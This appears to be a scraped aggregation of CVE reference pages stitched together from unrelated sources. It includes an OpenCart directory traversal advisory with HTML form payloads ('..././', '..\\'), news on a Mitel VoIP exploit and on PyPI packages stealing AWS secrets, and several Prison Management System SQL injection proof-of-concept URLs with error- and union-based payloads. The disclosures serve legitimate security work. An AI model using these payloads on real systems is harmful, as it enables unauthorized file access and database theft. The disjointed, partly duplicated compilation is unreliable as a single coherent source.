In OpenCart 1.4.7 to 1.5.5.1, implemented anti-traversal code in filemanager.php is ineffective and can be bypassed.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Janek Vind <come2waraxe () yahoo com>  
_Date_: Tue, 19 Mar 2013 09:21:51 -0700 (PDT)  

\[waraxe-2013-SA#098\] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1
===============================================================================

Author: Janek Vind "waraxe"
Date: 19. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-98.html

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OpenCart is a turn-key ready "out of the box" shopping cart solution.
You simply install, select your template, add products and your ready to start
accepting orders.

http://www.opencart.com/

Affected are all OpenCart versions, from 1.4.7 to 1.5.5.1, maybe older too.

###############################################################################
1. Directory Traversal Vulnerabilities in "filemanager.php"
###############################################################################

Reason: insufficient sanitization of user-supplied data
Attack vectors:
 1. user-supplied POST parameters "directory", "name", "path", "from", "to"
Preconditions:
 1. Logged in as admin with filemanager access privileges
 
Script "filemanager.php" offers for OpenCart admins various file related services:
directory listing and creation, image file listing, file copy/move/unlink, upload,
image resize. By the design OpenCart admin can manage files and directories only
inside specific subdirectory "image/data/". It means, that even if you have
OpenCart admin privileges, you still are not suppose to get access to the files
and directories below "image/data/". So far, so good.
But what about directory traversal? Let's have a look at the source code.

PHP script "admin/controller/common/filemanager.php" line 66:
------------------------\[ source code start \]----------------------------------
public function directory() {    
    $json = array();
    
    if (isset($this->request->post\['directory'\])) {
        $directories = glob(rtrim(DIR\_IMAGE . 'data/' . 
           str\_replace('../', '', $this->request->post\['directory'\]), '/') . 
           '/\*', GLOB\_ONLYDIR); 
        
        if ($directories) {
            $i = 0;
        
            foreach ($directories as $directory) {
                $json\[$i\]\['data'\] = basename($directory);
                $json\[$i\]\['attributes'\]\['directory'\] = 
                   utf8\_substr($directory, strlen(DIR\_IMAGE . 'data/'));
...
    
    $this->response->setOutput(json\_encode($json));
------------------------\[ source code end \]------------------------------------

We can see, that directory traversal is prevented by removing "../" substrings
from user submitted parameters. At first look this seems to be secure enough -
if we can't use "../", then directory traversal is impossible, right?
Deeper analysis shows couple of shortcomings in specific filtering method.
First problem - if OpenCart is hosted on Windows platform, then it's possible
to use "..\\" substring for directory traversal.

Test (parameter "token" must be valid):
-------------------------\[ test code start \]-----------------------------------
<html><body><center>
<form 
action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25";
 method="post">
<input type="hidden" name="directory" value="..\\..\\..\\">
<input type="submit" value="Test">
</form>
</center></body></html>
--------------------------\[ test code end \]------------------------------------

Server response is in JSON format and contains listing of subdirectories outside
of OpenCart main directory.

Second problem - filtering with "str\_replace" can be tricked by using custom
strings. If we use "..././" substring, then after filtering in becomes "../".
So it appears, that implemented anti-traversal code is ineffective and can
be bypassed.

Test (parameter "token" must be valid):
-------------------------\[ test code start \]-----------------------------------
<html><body><center>
<form 
action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25";
 method="post">
<input type="hidden" name="directory" value="..././..././..././..././">
<input type="submit" value="Test">
</form>
</center></body></html>
--------------------------\[ test code end \]------------------------------------

Server response is exactly same as in previous test - information about directory
structure outside of OpenCart main directory has been disclosed.

PHP script "filemanager.php" contains 14 uses of "str\_replace('../', ''," code.
Most of the public functions in "filemanager.php" are affected by directory
traversal vulnerability:

public function directory() -> listing of subdirectories
public function files() -> listing of image files
public function create() -> creation of new directories
public function delete() -> deletion of arbitrary files and directories
public function move() -> renaming of files or directories
public function copy() -> copying of files or directories
public function rename() -> renaming of files or directories
public function upload() -> uploading of image or flash files



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe () yahoo com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- \[ EOF \] ------------------------------------

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

**Current thread:**

*   **\[waraxe-2013-SA#098\] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1** _Janek Vind (Mar 19)_

CVE-2013-1891: Full Disclosure: [waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1

A suspected ransomware intrusion against an unnamed target leveraged a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment.
The findings come from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP device sitting on the network perimeter, while also identifying a previously unknown

A suspected ransomware intrusion against an unnamed target leveraged a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment.

The findings come from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP device sitting on the network perimeter, while also identifying a previously unknown exploit as well as a couple of anti-forensic measures adopted by the actor on the device to erase traces of their actions.

The exploit in question is tracked as CVE-2022-29499 and was fixed by Mitel in April 2022. It's rated 9.8 out of 10 for severity on the CVSS vulnerability scoring system, making it a critical shortcoming.

"A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances – SA 100, SA 400, and Virtual SA) which could allow a malicious actor to perform remote code execution (CVE-2022-29499) within the context of the Service Appliance," the company noted in an advisory.

The exploit entailed two HTTP GET requests — which are used to retrieve a specific resource from a server — to trigger remote code execution by fetching rogue commands from the attacker-controlled infrastructure.

In the incident investigated by CrowdStrike, the attacker is said to have used the exploit to create a reverse shell, utilizing it to launch a web shell ("pdf\_import.php") on the VoIP appliance and download the open source Chisel proxy tool.

The binary was then executed, but only after renaming it to "memdump" in an attempt to fly under the radar and use the utility as a "reverse proxy to allow the threat actor to pivot further into the environment via the VOIP device." But subsequent detection of the activity halted their progress and prevented them from moving laterally across the network.

The disclosure arrives less than two weeks after German penetration testing firm SySS revealed two flaws in Mitel 6800/6900 desk phones (CVE-2022-29854 and CVE-2022-29855) that, if successfully exploited, could allow an attacker to gain root privileges on the devices.

"Timely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant," CrowdStrike researcher Patrick Bennett said.

"Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via 'one hop' from the compromised device."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Exploit Mitel VoIP Zero-Day Bug to Deploy Ransomware

Researchers have discovered a number of malicious Python packages in the official third-party software repository that are engineered to exfiltrate AWS credentials and environment variables to a publicly exposed endpoint.
The list of packages includes loglib-modules, pyg-modules, pygrata, pygrata-utils, and hkg-sol-utils, according to Sonatype security researcher Ax Sharma. The packages and as

Researchers have discovered a number of malicious Python packages in the official third-party software repository that are engineered to exfiltrate AWS credentials and environment variables to a publicly exposed endpoint.

The list of packages includes loglib-modules, pyg-modules, pygrata, pygrata-utils, and hkg-sol-utils, according to Sonatype security researcher Ax Sharma. The packages and as well as the endpoint have now been taken down.

"Some of these packages either contain code that reads and exfiltrates your secrets or use one of the dependencies that will do the job," Sharma said.

The malicious code injected into "loglib-modules" and "pygrata-utils" allow it to harvest AWS credentials, network interface information, and environment variables and export them to a remote endpoint: "hxxp://graph.pygrata\[.\]com:8000/upload."

Troublingly, the endpoints hosting this information in the form of hundreds of .TXT files were not secured by any authentication barrier, effectively permitting any party on the web to access these credentials.

It's noteworthy that packages like "pygrata" use one of the aforementioned two packages as a dependency and do not harbor the code themselves. The identity of the threat actor and their motives remain unclear.

"Were the stolen credentials being intentionally exposed on the web or a consequence of poor OPSEC practices?," Sharma questioned. "Should this be some kind of legitimate security testing, there surely isn't much information at this time to rule out the suspicious nature of this activity."

This is not the first time similar rogue packages have been unearthed on open source repositories. Exactly a month back, two trojanized Python and PHP packages, named ctx and phpass, were uncovered in yet another instance of a software supply chain attack.

An Istanbul-based security researcher Yunus Aydın, subsequently, claimed responsibility for the unauthorized modifications, stating he merely wanted to "show how this simple attack affects +10M users and companies."

In a similar vein, a German penetration testing company named Code White owned up last month to uploading malicious packages to the NPM registry in a bid to realistically mimic dependency confusion attacks targeting its customers in the country, most of which are prominent media, logistics, and industrial firms.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Multiple Backdoored Python Libraries Caught Stealing AWS Secrets and Keys

A vulnerability classified as critical was found in Simple Ads Manager Plugin. This vulnerability affects unknown code. The manipulation leads to code injection. The attack can be initiated remotely.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Summer of Pwnage <lists () securify nl>  
_Date_: Wed, 1 Mar 2017 07:04:52 +0100  

\------------------------------------------------------------------------
Simple Ads Manager WordPress plugin unauthenticated PHP Object injection
vulnerability
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A PHP Object injection vulnerability was found in the Simple Ads Manager
WordPress plugin. The unauthenticated PHP Object injection vulnerability
can be used by an unautenthicated user to instantiate arbitrary PHP
Objects. This issue can potentially result in arbitrary code execution,
but this has not been confirmed.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0041

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was succesfully tested on the Simple Ads Manager WordPress
plugin version 2.9.8.125.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/simple\_ads\_manager\_wordpress\_plugin\_unauthenticated\_php\_object\_injection\_vulnerability.html

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Simple Ads Manager WordPress plugin unauthenticated PHP Object injection vulnerability** _Summer of Pwnage (Feb 28)_

CVE-2017-20095: Simple Ads Manager WordPress plugin unauthenticated PHP Object injection vulnerability

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/prisons/view_prison.php:4

**CVE-2022-32405****Info****Prison Management System 1.0 - SQL Injection  
****Vendor Homepage : https://www.sourcecodester.com/  
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html**

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/prisons/view_prison.php:4

$qry = $conn\->query("SELECT \* from \`prison\_list\` where id = '{$\_GET\['id'\]}' and delete\_flag = 0 ");

**PoC**

*   Payload :

    # Error Based
    http://localhost/pms/admin/prisons/view_prison.php?id=1'-if(database()='pms_db',0,1)%23
    

*   True : http://localhost/pms/admin/prisons/view_prison.php?id=1'-if(database()='pms_db',0,1)%23 
*   False : http://localhost/pms/admin/prisons/view_prison.php?id=1'-if(database()='wrong',0,1)%23

CVE-2022-32405: BugBounty/cve-2022-32405.md at main · Dyrandy/BugBounty

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/inmates/manage_inmate.php:3

**CVE-2022-32404****Info****Prison Management System 1.0 - SQL Injection  
****Vendor Homepage : https://www.sourcecodester.com/  
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html**

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/inmates/manage_inmate.php:3

$qry = $conn\->query("SELECT \* from \`inmate\_list\` where id = '{$\_GET\['id'\]}' ");

**PoC**

*   Payload :

    # Error Based
    http://localhost/pms/admin/?page=inmates/manage_inmate&id=1'-if(database()='pms_db',0,1)%23
    

*   True : http://localhost/pms/admin/?page=inmates/manage_inmate&id=1'-if(database()='pms_db',0,1)%23 
*   False : http://localhost/pms/admin/?page=inmates/manage_inmate&id=1'-if(database()='wrong',0,1)%23

CVE-2022-32404: BugBounty/cve-2022-32404.md at main · Dyrandy/BugBounty

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/inmates/manage_record.php:4

Submitted by oretnom23 on Tuesday, May 31, 2022 - 15:52.

****Introduction****

This project is entitled **Prison Management System**. This is a web-based application project developed in **PHP** and **MySQL Database**. The main purpose of this project is to provide an online and automated platform for the **Prison** to manage the inmates' records and daily visitors. This project has a pleasant user interface with the help of **Bootstrap Framework** and **AdminLTE Template**. It also consists of user-friendly features and functionalities.

****About the Prison Management System****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Font Awesome**
*   **AdminLTE**

This **Prison Management System** is only accessible to the Prison's Management. The system has 2 types of user roles which are the **Administrator** and **Staff**. The application requires the management to log in with their valid credentials to gain access to the features and functionalities. This project sores and manages the convicted persons' records. It stores the convict's personal information, case information, and records inside the prison. This application stores the visitor details when visiting the inmates. Management can update the inmate visitor privilege. The **Prison Management System** also generates printable Monthly Reports of **Records History** and **Visitor Records**.

****Features****

*   **Home Page**
    *   Display the summary.
*   **Prison Management**
    *   Add New Prison
    *   List All Prisons
    *   Edit/Update Prison Details
    *   View Prison Details
    *   Delete Prison
*   **Cell Block Management**
    *   Add New Cell Block
    *   List All Cell Blocks
    *   Edit/Update Cell Block Details
    *   View Cell Block Details
    *   Delete Cell Block
*   **Action Management**
    *   Add New Action
    *   List All Actions
    *   Edit/Update Action Details
    *   View Action Details
    *   Delete Action
*   **Crime Management**
    *   Add New Crime
    *   List All Crimes
    *   Edit/Update Crime Details
    *   View Crime Details
    *   Delete Crime
*   **Inmate Management**
    *   Add New Inmate
    *   List All Inmate
    *   View Inmate Details
    *   Edit Inmate Details
    *   Update Inmate Visitor Privilege
    *   Print Inmate Details
    *   Add Record
    *   List All Records
    *   Delete Record
*   **Visitor Management**
    *   Add New Visitor Details
    *   List All Visitor Details
    *   Edit Visitor Details
    *   View Visitor Details
    *   Delete Visitor Details
*   **Generate Printable Reports**
    *   Monthly Inmate Record
    *   Monthly Visitor Records
*   **User Management**
    *   Add New User
    *   List All Users
    *   Edit User Details
    *   Delete User Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots******Dashboard Page****

****Inmate Details****

****Inmate Details - Print View****

****Monthly Inmate Records Report****

****Monthly Visitor Records Report****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** naming ****pms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****pms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Prison Management System** in a **browser**. i.e. ****http://localhost/pms/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

**DEMO VIDEO**

That's it. You can now explore the features and functionalities of this **Prison Management System** in **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   1349 views

CVE-2022-32403: Prison Management System in PHP/OOP Free Source Code

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/inmates/manage_privilege.php:4

**CVE-2022-32401****Info****Prison Management System 1.0 - SQL Injection  
****Vendor Homepage : https://www.sourcecodester.com/  
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html**

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/inmates/manage_privilege.php:4

$qry = $conn\->query("SELECT \* FROM \`inmate\_list\` where id = '{$\_GET\['id'\]}'");

**PoC**

*   Payload :

    # Error Based
    http://localhost/pms/admin/inmates/manage_privilege.php?id=1'-if(database()='pms_db',0,1)%23
    

*   True : http://localhost/pms/admin/inmates/manage_privilege.php?id=1'-if(database()='pms_db',0,1)%23 
*   False : http://localhost/pms/admin/inmates/manage_privilege.php?id=1'-if(database()='wrong',0,1)%23

CVE-2022-32401: BugBounty/cve-2022-32401.md at main · Dyrandy/BugBounty

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/user/manage_user.php:4.

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/user/manage_user.php:4

$user = $conn\->query("SELECT \* FROM users where id ='{$\_GET\['id'\]}' ");

    # Union Based
    http://localhost/pms/admin/?page=user/manage_user&id=-1'%20union%20select%201,database(),3,4,5,6,7,8,9,10,11%23

CVE-2022-32400: BugBounty/cve-2022-32400.md at main · Dyrandy/BugBounty

Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the 'id' parameter at /pms/admin/visits/manage_visit.php:4

**CVE-2022-32396****Info****Prison Management System 1.0 - SQL Injection  
****Vendor Homepage : https://www.sourcecodester.com/  
****Software Link : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html**

\[+\] Vulnerability : SQL Injection  
\[+\] Vulnerability Location : $_GET['id'] in /pms/admin/visits/manage_visit.php:4

$qry = $conn\->query("SELECT \* from \`visit\_list\` where id = '{$\_GET\['id'\]}' ");

**PoC**

*   Payload :

    # Error Based
    http://localhost/pms/admin/visits/manage_visit.php?id=1'-if(database()='pms_db',0,1)%23
    

*   True : http://localhost/pms/admin/visits/manage_visit.php?id=1'-if(database()='pms_db',0,1)%23 
*   False : http://localhost/pms/admin/visits/manage_visit.php?id=1'-if(database()='wrong',0,1)%23

Tag

#php